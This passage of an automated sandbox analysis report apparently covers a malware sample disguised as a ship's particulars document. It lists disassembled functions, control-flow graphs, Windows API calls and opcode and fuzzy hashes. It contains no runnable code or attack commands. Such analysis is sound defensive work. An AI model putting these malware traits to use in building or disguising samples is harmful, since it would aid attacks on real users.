                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2063062207-0
                                                                                                                  • Opcode ID: 090f967679a40e675a6bf22b556bae785f20be49aa233978c34a9263a56cb745
                                                                                                                  • Instruction ID: 1ce1ad71a0e0339207d7deb995cc016146121235f8a17fc52c97921abbf5bec9
                                                                                                                  • Opcode Fuzzy Hash: 090f967679a40e675a6bf22b556bae785f20be49aa233978c34a9263a56cb745
                                                                                                                  • Instruction Fuzzy Hash: 515187B0900309CFDB54CFAADA48B9EBBF5EF88314F208419E519A73A0D7756984CF65
                                                                                                                  Function 06919158 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1003 6919158-691917d 1004 691917f-6919182 1003->1004 1005 6919184-69191a3 1004->1005 1006 69191a8-69191ab 1004->1006 1005->1006 1007 69191b1-69191c6 1006->1007 1008 6919a6b-6919a6d 1006->1008 1015 69191c8-69191ce 1007->1015 1016 69191de-69191f4 1007->1016 1010 6919a74-6919a77 1008->1010 1011 6919a6f 1008->1011 1010->1004 1013 6919a7d-6919a87 1010->1013 1011->1010 1017 69191d0 1015->1017 1018 69191d2-69191d4 1015->1018 1020 69191ff-6919201 1016->1020 1017->1016 1018->1016 1021 6919203-6919209 1020->1021 1022 6919219-691928a 1020->1022 1023 691920b 1021->1023 1024 691920d-691920f 1021->1024 1033 69192b6-69192d2 1022->1033 1034 691928c-69192af 1022->1034 1023->1022 1024->1022 1039 69192d4-69192f7 1033->1039 1040 69192fe-6919319 1033->1040 1034->1033 1039->1040 1045 6919344-691935f 1040->1045 1046 691931b-691933d 1040->1046 1051 6919361-6919383 1045->1051 1052 691938a-6919394 1045->1052 1046->1045 1051->1052 1053 69193a4-691941e 1052->1053 1054 6919396-691939f 1052->1054 1060 6919420-691943e 1053->1060 1061 691946b-6919480 1053->1061 1054->1013 1065 6919440-691944f 1060->1065 1066 691945a-6919469 1060->1066 1061->1008 1065->1066 1066->1060 1066->1061
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $fq$$fq$$fq$$fq
                                                                                                                  • API String ID: 0-2113499236
                                                                                                                  • Opcode ID: 2a7e2f9828c7fcc1cc624cf61d4568ba8bd63860a2a0e5aae86b3385e433a918
                                                                                                                  • Instruction ID: 9eba9586da37f4160ce9150e098a0dbd821982cce703041823c5c8a704c38ceb
                                                                                                                  • Opcode Fuzzy Hash: 2a7e2f9828c7fcc1cc624cf61d4568ba8bd63860a2a0e5aae86b3385e433a918
                                                                                                                  • Instruction Fuzzy Hash: 35915534F1021A8FDB54DF68D9A076E77F6BF85200F208569C819EB798EF309D468B91
                                                                                                                  Function 0691CF48 Relevance: 4.5, Strings: 3, Instructions: 797COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1069 691cf48-691cf63 1070 691cf65-691cf68 1069->1070 1071 691cfb1-691cfb4 1070->1071 1072 691cf6a-691cfac 1070->1072 1073 691cfd7-691cfda 1071->1073 1074 691cfb6-691cfd2 1071->1074 1072->1071 1075 691d023-691d026 1073->1075 1076 691cfdc-691d01e 1073->1076 1074->1073 1079 691d028-691d037 1075->1079 1080 691d06f-691d072 1075->1080 1076->1075 1085 691d046-691d052 1079->1085 1086 691d039-691d03e 1079->1086 1083 691d074-691d083 1080->1083 1084 691d0bb-691d0be 1080->1084 1087 691d092-691d09e 1083->1087 1088 691d085-691d08a 1083->1088 1089 691d0c0-691d102 1084->1089 1090 691d107-691d10a 1084->1090 1092 691d965-691d99e 1085->1092 1093 691d058-691d06a 1085->1093 1086->1085 1087->1092 1096 691d0a4-691d0b6 1087->1096 1088->1087 1089->1090 1097 691d110-691d113 1090->1097 1098 691d434-691d440 1090->1098 1107 691d9a0-691d9a3 1092->1107 1093->1080 1096->1084 1101 691d115-691d11a 1097->1101 1102 691d11d-691d120 1097->1102 1098->1079 1104 691d446-691d733 1098->1104 1101->1102 1109 691d122-691d124 1102->1109 1110 691d12f-691d132 1102->1110 1282 691d739-691d73f 1104->1282 1283 691d95a-691d964 1104->1283 1112 691d9a5-691d9c1 1107->1112 1113 691d9c6-691d9c9 1107->1113 1114 691d12a 1109->1114 1115 691d2ef-691d2f8 1109->1115 1116 691d134-691d176 1110->1116 1117 691d17b-691d17e 1110->1117 1112->1113 1125 691d9cb-691d9f7 1113->1125 1126 691d9fc-691d9ff 1113->1126 1114->1110 1119 691d307-691d313 1115->1119 1120 691d2fa-691d2ff 1115->1120 1116->1117 1123 691d180-691d1c2 1117->1123 1124 691d1c7-691d1ca 1117->1124 1131 691d424-691d429 1119->1131 1132 691d319-691d32d 1119->1132 1120->1119 1123->1124 1129 691d213-691d216 1124->1129 1130 691d1cc-691d20e 1124->1130 1125->1126 1135 691da01 call 691dabd 1126->1135 1136 691da0e-691da10 1126->1136 1140 691d218-691d25a 1129->1140 1141 691d25f-691d262 1129->1141 1130->1129 1157 691d431 1131->1157 1132->1157 1158 691d333-691d345 1132->1158 1143 691da07-691da09 1135->1143 1137 691da12 1136->1137 1138 691da17-691da1a 1136->1138 1137->1138 1138->1107 1146 691da1c-691da2b 1138->1146 1140->1141 1152 691d264-691d2a6 1141->1152 1153 691d2ab-691d2ae 1141->1153 1143->1136 1169 691da92-691daa7 1146->1169 1170 691da2d-691da90 call 69165a0 1146->1170 1152->1153 1154 691d2b0-691d2b2 1153->1154 1155 691d2bd-691d2c0 1153->1155 1154->1157 1164 691d2b8 1154->1164 1165 691d2c2-691d2d8 1155->1165 1166 691d2dd-691d2df 1155->1166 1157->1098 1182 691d347-691d34d 1158->1182 1183 691d369-691d36b 1158->1183 1164->1155 1165->1166 1171 691d2e1 1166->1171 1172 691d2e6-691d2e9 1166->1172 1196 691daa8 1169->1196 1170->1169 1171->1172 1172->1070 1172->1115 1188 691d351-691d35d 1182->1188 1189 691d34f 1182->1189 1187 691d375-691d381 1183->1187 1205 691d383-691d38d 1187->1205 1206 691d38f 1187->1206 1197 691d35f-691d367 1188->1197 1189->1197 1196->1196 1197->1187 1209 691d394-691d396 1205->1209 1206->1209 1209->1157 1213 691d39c-691d3b8 call 69165a0 1209->1213 1222 691d3c7-691d3d3 1213->1222 1223 691d3ba-691d3bf 1213->1223 1222->1131 1225 691d3d5-691d422 1222->1225 1223->1222 1225->1157 1284 691d741-691d746 1282->1284 1285 691d74e-691d757 1282->1285 1284->1285 1285->1092 1286 691d75d-691d770 1285->1286 1288 691d776-691d77c 1286->1288 1289 691d94a-691d954 1286->1289 1290 691d78b-691d794 1288->1290 1291 691d77e-691d783 1288->1291 1289->1282 1289->1283 1290->1092 1292 691d79a-691d7bb 1290->1292 1291->1290 1295 691d7ca-691d7d3 1292->1295 1296 691d7bd-691d7c2 1292->1296 1295->1092 1297 691d7d9-691d7f6 1295->1297 1296->1295 1297->1289 1300 691d7fc-691d802 1297->1300 1300->1092 1301 691d808-691d821 1300->1301 1303 691d827-691d84e 1301->1303 1304 691d93d-691d944 1301->1304 1303->1092 1307 691d854-691d85e 1303->1307 1304->1289 1304->1300 1307->1092 1308 691d864-691d87b 1307->1308 1310 691d88a-691d8a5 1308->1310 1311 691d87d-691d888 1308->1311 1310->1304 1316 691d8ab-691d8c4 call 69165a0 1310->1316 1311->1310 1320 691d8d3-691d8dc 1316->1320 1321 691d8c6-691d8cb 1316->1321 1320->1092 1322 691d8e2-691d936 1320->1322 1321->1320 1322->1304
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $fq$$fq$$fq
                                                                                                                  • API String ID: 0-837900676
                                                                                                                  • Opcode ID: ec2d8e6e227887aa8b8b7a192684afe4160a1bbc335f4c8ec2384d20a94dd3d4
                                                                                                                  • Instruction ID: 8609b96ab3e950b9f1c6b4d9e024d4ecbf752ebe3afebec7f8c2b2f109c8f1e7
                                                                                                                  • Opcode Fuzzy Hash: ec2d8e6e227887aa8b8b7a192684afe4160a1bbc335f4c8ec2384d20a94dd3d4
                                                                                                                  • Instruction Fuzzy Hash: 14625E30A0020A8FCB55EF68D590A5EB7B2FF85304F208A68D415DF769DB75ED86CB81
                                                                                                                  Function 06914B70 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1330 6914b70-6914b94 1331 6914b96-6914b99 1330->1331 1332 6915278-691527b 1331->1332 1333 6914b9f-6914c97 1331->1333 1334 691527d-6915297 1332->1334 1335 691529c-691529e 1332->1335 1353 6914d1a-6914d21 1333->1353 1354 6914c9d-6914cea call 6915419 1333->1354 1334->1335 1336 69152a0 1335->1336 1337 69152a5-69152a8 1335->1337 1336->1337 1337->1331 1339 69152ae-69152bb 1337->1339 1355 6914da5-6914dae 1353->1355 1356 6914d27-6914d97 1353->1356 1367 6914cf0-6914d0c 1354->1367 1355->1339 1373 6914da2 1356->1373 1374 6914d99 1356->1374 1370 6914d17 1367->1370 1371 6914d0e 1367->1371 1370->1353 1371->1370 1373->1355 1374->1373
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: fkq$XPkq$\Okq
                                                                                                                  • API String ID: 0-673657909
                                                                                                                  • Opcode ID: f4ebdcdbeaa07d44df0a2f29954a540945f9346d700855a26a97d7de41d9fa5b
                                                                                                                  • Instruction ID: 19b6d7ad2baacf403d73ba153cd0b84f18e47bdffc404accce5ef9d879402e9a
                                                                                                                  • Opcode Fuzzy Hash: f4ebdcdbeaa07d44df0a2f29954a540945f9346d700855a26a97d7de41d9fa5b
                                                                                                                  • Instruction Fuzzy Hash: 44618E70E002189FEF549FA9C8547AEBBF6EF88700F20842AE506AB395DF759C45CB50
                                                                                                                  Function 06919149 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $fq$$fq
                                                                                                                  • API String ID: 0-2537786760
                                                                                                                  • Opcode ID: 10d1a587c4972047d3f930e648a3ee39db23905949d4ee3f4cfa9a9358654603
                                                                                                                  • Instruction ID: 3cda13456a7efddec0d49ead0688fda887ef8567e521ae867eb1968d97e6a2cf
                                                                                                                  • Opcode Fuzzy Hash: 10d1a587c4972047d3f930e648a3ee39db23905949d4ee3f4cfa9a9358654603
                                                                                                                  • Instruction Fuzzy Hash: 56516434B001069FDB54DF68E9A076E77F6EF85210F248969D819DB398EB30DD42CB90
                                                                                                                  Function 0690AF10 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0690B176
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193123024.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6900000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4139908857-0
                                                                                                                  • Opcode ID: f2c5b3fd0f67e6e686ab391cfef9bf1420c501725687dc81798a5ca69256390f
                                                                                                                  • Instruction ID: e853278768a74da6a994257c626482efa5a2f35ea0862dc6810003e4079f9d5f
                                                                                                                  • Opcode Fuzzy Hash: f2c5b3fd0f67e6e686ab391cfef9bf1420c501725687dc81798a5ca69256390f
                                                                                                                  • Instruction Fuzzy Hash: 91819CB0A00B058FE7A4DF29D44475ABBF5FF88300F108A2DE59AD7A81DB35E845CB91
                                                                                                                  Function 051EEA51 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4191623939.00000000051E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_51e0000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 96a36f90b1a4de9fefea5ee944a9c4cb9694eb057d4bb2911a422de35e2f86d3
                                                                                                                  • Instruction ID: 1e1d56fc671bcf2729c0d7f3a8344f0b23636dac164412617c9e30e1273f237b
                                                                                                                  • Opcode Fuzzy Hash: 96a36f90b1a4de9fefea5ee944a9c4cb9694eb057d4bb2911a422de35e2f86d3
                                                                                                                  • Instruction Fuzzy Hash: D8414372D043858FCB14DFA9D4046AEBBB5AFC9310F1486ABD845E7241DB749845CBA1
                                                                                                                  Function 0690D0EF Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0690D202
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193123024.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6900000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 716092398-0
                                                                                                                  • Opcode ID: 9aa0645ff9f6214493c38c1eb2ef0697b939e9449137e40477015e0d5bae94fd
                                                                                                                  • Instruction ID: 80a9716fa16356abe44f039b23d5ea6001658cf02e3812c28fa92aeba4b68f22
                                                                                                                  • Opcode Fuzzy Hash: 9aa0645ff9f6214493c38c1eb2ef0697b939e9449137e40477015e0d5bae94fd
                                                                                                                  • Instruction Fuzzy Hash: D541B0B1D003099FDB14CF99C984ADEBFB5BF88310F24812AE819AB250D7759885CF90
                                                                                                                  Function 0690D0F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0690D202
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193123024.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6900000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 716092398-0
                                                                                                                  • Opcode ID: 22123175440af56bc42c7be16078486cd7692016c68bb6488793d2415b896273
                                                                                                                  • Instruction ID: 9d5dc939a7c0873e01ed276a9ff2364242886dd145851efc2a430f0d88350843
                                                                                                                  • Opcode Fuzzy Hash: 22123175440af56bc42c7be16078486cd7692016c68bb6488793d2415b896273
                                                                                                                  • Instruction Fuzzy Hash: A541B0B1D003099FDB14CF99C984ADEBFB5BF88310F24812AE819AB250D7759885CF90
                                                                                                                  Function 0690A5EC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 0690F8F1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193123024.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6900000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallProcWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2714655100-0
                                                                                                                  • Opcode ID: 3d6e2c6e94fbfc154806b67d91b6d50f126ce9dc479e81f23d00fc4a9860b4f0
                                                                                                                  • Instruction ID: 867906fb041522df8b27ba6012b170cb9af8e9774637f12cc22992fd0c96b14c
                                                                                                                  • Opcode Fuzzy Hash: 3d6e2c6e94fbfc154806b67d91b6d50f126ce9dc479e81f23d00fc4a9860b4f0
                                                                                                                  • Instruction Fuzzy Hash: E3417CB4900309DFDB64CF99C488AAABBF5FF88314F24C459D919A7361C734A945CFA0
                                                                                                                  Function 06902AB8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06902B47
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193123024.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6900000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DuplicateHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3793708945-0
                                                                                                                  • Opcode ID: ade5f98c86f592279b5b7398cc00eb95027cc6e2943e063c39e880111f62311c
                                                                                                                  • Instruction ID: 166d2044acaa8523569b037a28a2374467703d3d23d95849e0eee9d50468984a
                                                                                                                  • Opcode Fuzzy Hash: ade5f98c86f592279b5b7398cc00eb95027cc6e2943e063c39e880111f62311c
                                                                                                                  • Instruction Fuzzy Hash: 412103B5D00209DFDB10CFAAD984AEEBBF4EF48310F14801AE914A7750C378A940CF61
                                                                                                                  Function 06902AC0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06902B47
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193123024.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6900000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DuplicateHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3793708945-0
                                                                                                                  • Opcode ID: 1ea2d2c30a41c1baf58830b73454d82d9e52a346366f55040f8571b654a59755
                                                                                                                  • Instruction ID: 6618bb40e661df2ff333d7751894f48c248dc601c21cf4c3ba8dc1ede89d14d5
                                                                                                                  • Opcode Fuzzy Hash: 1ea2d2c30a41c1baf58830b73454d82d9e52a346366f55040f8571b654a59755
                                                                                                                  • Instruction Fuzzy Hash: 8621C4B5D002499FDB10CF9AD984ADEFBF9EB48320F14841AE914A7350D378A944DF65
                                                                                                                  Function 051EEB38 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 051EEB9F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4191623939.00000000051E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_51e0000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1890195054-0
                                                                                                                  • Opcode ID: 02268ccc0c07e109d0222e293b10c65ec34e09779898b60d8acf94966340ab68
                                                                                                                  • Instruction ID: 6c9635bd2d14ac1a83428528a334c5da6934d7c0866bf8218fe49fe5f802e2fb
                                                                                                                  • Opcode Fuzzy Hash: 02268ccc0c07e109d0222e293b10c65ec34e09779898b60d8acf94966340ab68
                                                                                                                  • Instruction Fuzzy Hash: EF11F6B1C006599BCB10CF9AC545BDEFBF8BF48320F14816AD918B7240D378A944CFA5
                                                                                                                  Function 0690B110 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0690B176
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193123024.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6900000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4139908857-0
                                                                                                                  • Opcode ID: 815b1b4fddaea5f314e38b14bb9f8d6ae156eb9b67147e90e3d57f79c001c63d
                                                                                                                  • Instruction ID: 12ae90a56969446e8e053993d24e8d7e29b3875ac884ff36309f60fa6641e480
                                                                                                                  • Opcode Fuzzy Hash: 815b1b4fddaea5f314e38b14bb9f8d6ae156eb9b67147e90e3d57f79c001c63d
                                                                                                                  • Instruction Fuzzy Hash: EF11D2B6C007498FDB20CF9AC944A9EFBF8EB88324F24841AD519B7650D379A545CFA1
                                                                                                                  Function 06914B60 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: XPkq
                                                                                                                  • API String ID: 0-3796509991
                                                                                                                  • Opcode ID: c9a1021459647e217d84041a6a0d1e9169444d1591f9b4e81b6d46217f4e412f
                                                                                                                  • Instruction ID: e1cb5f4d9748d04eb6c0844b5d665ff5834747e235b335df737c5a18bab383d3
                                                                                                                  • Opcode Fuzzy Hash: c9a1021459647e217d84041a6a0d1e9169444d1591f9b4e81b6d46217f4e412f
                                                                                                                  • Instruction Fuzzy Hash: 6A519270E002189FDB54DFE9C814BAEBBF6EF88700F20852AE145AB395DB745C05CB90
                                                                                                                  Function 0691DABD Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: PHfq
                                                                                                                  • API String ID: 0-2154135885
                                                                                                                  • Opcode ID: 47906aab16151e0793dbf410047eb95e29c61de2b598415554ce4745e38e14ce
                                                                                                                  • Instruction ID: 3cdd649925aa8166d6b437beecfc1369711f69b2717d49be2181b3d7c1e72a32
                                                                                                                  • Opcode Fuzzy Hash: 47906aab16151e0793dbf410047eb95e29c61de2b598415554ce4745e38e14ce
                                                                                                                  • Instruction Fuzzy Hash: 90418E70E0020E9FDF55DF65D8846AEBBB6AF85200F304929E402EB640DF74984ADB91
                                                                                                                  Function 069121C8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: PHfq
                                                                                                                  • API String ID: 0-2154135885
                                                                                                                  • Opcode ID: 4761dd29e4e4099231a9ef729e96d29cf05d031fd252c2eb2ff1e84dda231289
                                                                                                                  • Instruction ID: 38cbd2a6ab37c896229da5e68998bf20452cd412ae38aa7e50e153d53ad8e959
                                                                                                                  • Opcode Fuzzy Hash: 4761dd29e4e4099231a9ef729e96d29cf05d031fd252c2eb2ff1e84dda231289
                                                                                                                  • Instruction Fuzzy Hash: C731C131B002098FDF58AB74D95466E7BA6AF89204F304828D406EF794EF35DD86C7A1
                                                                                                                  Function 069182D0 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $fq
                                                                                                                  • API String ID: 0-12477121
                                                                                                                  • Opcode ID: c4dd4069e856b0edb360b65838dc7c18cfb6c92e024de17d238f013b591a8b58
                                                                                                                  • Instruction ID: f01b50b260fd4d23d8033d28fe4dbe15464cc4f530db95ace2450618c7da508d
                                                                                                                  • Opcode Fuzzy Hash: c4dd4069e856b0edb360b65838dc7c18cfb6c92e024de17d238f013b591a8b58
                                                                                                                  • Instruction Fuzzy Hash: 2FF08C31B002099FDFA99E58EB8066C73B9EB40254F384825E905DF645C731DE07E791
                                                                                                                  Function 06912340 Relevance: 1.0, Instructions: 1014COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 486b104b24c21daa02e3532cf8be5195f8f806a1dfe2c16648d4244a756f5297
                                                                                                                  • Instruction ID: 7a0757735ef28d687471e11c95896c99e19040df15658876866506772f4d230d
                                                                                                                  • Opcode Fuzzy Hash: 486b104b24c21daa02e3532cf8be5195f8f806a1dfe2c16648d4244a756f5297
                                                                                                                  • Instruction Fuzzy Hash: AC924734E002088FDB64EB68C584B5DBBF6FB45314F6484A9D419AF7A5DB35ED81CB80
                                                                                                                  Function 069161F0 Relevance: .2, Instructions: 229COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6910000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 18323394134d3014c4a0f2f46c9fda10e952f2f8508d5414d305c1a6b454e039
                                                                                                                  • Instruction ID: f80a06e57d3284712d6cc5bc18d535d4f0ad796000e17c8e6e8fc78b45d2cda2
                                                                                                                  • Opcode Fuzzy Hash: 18323394134d3014c4a0f2f46c9fda10e952f2f8508d5414d305c1a6b454e039
                                                                                                                  • Instruction Fuzzy Hash: EE619172F005224FDB549B6DCC8066FBAEBAFC4220B254439D80EDB364DE66ED0287D1
                                                                                                                  Function 069142A1 Relevance: .2, Instructions: 220COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.4193172108.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
